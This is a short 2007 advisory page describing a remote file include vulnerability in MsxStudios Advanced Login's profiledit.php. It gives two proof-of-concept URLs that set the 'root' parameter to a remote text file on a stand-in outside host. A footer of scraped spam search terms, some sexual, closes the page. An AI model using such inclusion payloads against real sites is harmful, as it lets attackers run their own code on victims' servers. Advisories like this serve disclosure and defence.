about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , MsxStudios Advanced Login ProfileEdit.PHP Remote File Include Vulnerability


Title MsxStudios Advanced Login ProfileEdit.PHP Remote File Include Vulnerability
Published 2007-03-29-12:00AM
Updated 2007-03-29-12:00AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Zeni Susanto is credited with the discovery of this vulnerability.
Vulnerable  MsxStudios Advanced Login 0.76
MsxStudios Advanced Login 0.7
Not Vulnerable  
Code   Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/login/engine/db/profiledit.php?root==http://www.example2.com/colok.txt?
http://www.example.com/login/engine/profiledit.php?root==http://www.example2.com/colok.txt?
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 03 Dec 2009 19:29:02 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
mambo/inde zalupko Fee 3gp se pinkworld. Bitch sex www.sex ma shopadin 89xxl india masa 200 /compo Fuckingsto Crack Data www.pawnho mambots/co MRPC Tampilkan Selteco www.gils.c sexe arabe 89xxl Www.xxx.se ingrian sextoom co Cal six amar search/exp Crack Data Port+445 Www.Indian animal sex CMS is Fre www.sddcjb www. sex php-nuke 2 phpB...bay SEXtv1 vulnerabil www.ruelan 200 /compo www.bolywo Www.bugil. Www.Indian Crack Data vBulltin Pure poeti2000. news for C sexex garl tb source /search/ex